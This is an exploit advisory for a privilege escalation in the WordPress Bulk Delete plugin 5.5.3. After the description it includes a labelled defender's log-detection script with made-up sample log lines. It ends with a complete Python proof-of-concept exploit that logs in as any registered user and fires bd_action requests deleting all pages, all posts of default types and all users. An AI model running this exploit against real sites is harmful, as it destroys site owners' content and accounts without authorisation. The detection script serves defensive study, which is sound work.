WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation

  • Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
  • Discovery Date: February 10, 2016
  • Exploit Author: Panagiotis Vagenas
  • Software Link: https://wordpress.org/plugins/bulk-delete/
  • Version: 5.5.3
  • Tested on: WordPress 4.4.2
  • Category: WebApps, WordPress

Description:

Any registered user can escalate privileges through the task handling offered by _Bulk Delete_. Not every action is reachable this way; the following ones are:

  • bd_delete_pages_by_status: deletes all pages of every status
  • bd_delete_posts_by_post_type: deletes all posts of the selected post types
  • bd_delete_users_by_meta: deletes all users matching a specific meta value

Any user registered on the site can trigger these bd_action handlers, so this is a privilege escalation vulnerability.

The proof-of-concept test script follows:
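The handlers above are dispatched through the bd_action query parameter of wp-admin/index.php, which means every abuse of this weakness leaves a recognisable entry in the web server's access log. The following detection script is an added example for defenders and is not part of the original advisory; it assumes Apache/nginx "combined" log format, and the log lines it scans are constructed for illustration (the IPs and timestamps are made up). It flags every request that carries a bd_action parameter and marks the three actions named in the advisory as known-vulnerable, so a site owner can spot attempts (or successes) and correlate them with the WordPress account behind the session.

```python
#!/usr/bin/env python3
"""Added detection example: find access-log entries that invoke Bulk Delete's
bd_action handler on wp-admin/index.php.

Assumptions (not taken from the advisory): Apache/nginx "combined" log
format; the sample lines below are constructed for illustration.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Actions the advisory names as reachable by any registered user.
VULNERABLE_ACTIONS = {
    "delete_pages_by_status",
    "delete_posts_by_post_type",
    "delete_users_by_meta",
}

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def bd_action_of(path):
    """Return the bd_action value if the request targets wp-admin/index.php
    with that parameter, otherwise None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/index.php"):
        return None
    values = parse_qs(parts.query).get("bd_action")
    return values[0] if values else None


def find_bulk_delete_hits(lines):
    """Scan log lines and return one record per bd_action request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than crash
        action = bd_action_of(rec["path"])
        if action is None:
            continue
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "method": rec["method"],
            "action": action,
            "known_vulnerable": action in VULNERABLE_ACTIONS,
        })
    return hits


def hits_by_source(hits):
    """Count bd_action requests per client IP (quick triage view)."""
    return Counter(h["ip"] for h in hits)


# Constructed sample log (not real traffic); 203.0.113.5 fires the PoC,
# 198.51.100.7 is an ordinary admin session plus one unrelated action.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2016:10:00:01 +0000] "POST /wp-admin/index.php?bd_action=delete_pages_by_status HTTP/1.1" 302 0 "-" "python-requests/2.9.1"',
    '203.0.113.5 - - [10/Feb/2016:10:00:02 +0000] "POST /wp-admin/index.php?bd_action=delete_users_by_meta HTTP/1.1" 302 0 "-" "python-requests/2.9.1"',
    '198.51.100.7 - - [10/Feb/2016:10:01:00 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Feb/2016:10:01:05 +0000] "POST /wp-admin/index.php?bd_action=some_other_action HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in find_bulk_delete_hits(SAMPLE_LOG):
        flag = "VULNERABLE-ACTION" if hit["known_vulnerable"] else "other"
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} bd_action={hit["action"]} [{flag}]')
    print(dict(hits_by_source(find_bulk_delete_hits(SAMPLE_LOG))))
```

The access log alone cannot tell you which WordPress role issued the request; treat every flagged line as a lead and confirm against the WordPress session (user login and role) for that client before concluding it was an abuse. Because the PoC sends the action in the query string of a POST, the parameter survives in the log even though the form body does not.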

#!/usr/bin/python3

################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <[email protected]>
################################################################################

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

# Credentials of any registered account; no elevated role is needed.
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

l = requests.post(loginUrl, data=loginPostData)

# A successful login answers with a redirect, and the session cookies are set
# on that first response, so they are read from the redirect history.
if l.status_code != 200 or len(l.history) == 0 or \
        len(l.history[0].cookies) == 0:
    print("Couldn't acquire a valid session")
    exit(1)

loggedInCookies = l.history[0].cookies


def do_action(action, data):
    # Each task is dispatched through the bd_action query parameter of
    # wp-admin/index.php; the vulnerable version performs no capability check.
    try:
        requests.post(
            adminUrl + '?bd_action=' + action,
            data=data,
            cookies=loggedInCookies,
            timeout=30
        )
    except requests.exceptions.Timeout:
        # requests raises its own Timeout, not the built-in TimeoutError
        print('Action ' + action + ' timed out')
    else:
        print('Action ' + action + ' performed')


print('Deleting all pages')
do_action(
    'delete_pages_by_status',
    {
        'smbd_pages_force_delete': 'true',
        'smbd_published_pages': 'published_pages',
        'smbd_draft_pages': 'draft_pages',
        'smbd_pending_pages': 'pending_pages',
        'smbd_future_pages': 'future_pages',
        'smbd_private_pages': 'private_pages',
    }
)

print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
    'post',
    'page',
    'attachment',
    'revision',
    'nav_menu_item'
]})

print('Deleting all users')
do_action(
    'delete_users_by_meta',
    {
        'smbd_u_meta_key': 'nickname',
        'smbd_u_meta_compare': 'LIKE',
        'smbd_u_meta_value': '',
    }
)

exit(0)

This code is offensive in nature; comply with your local laws and regulations.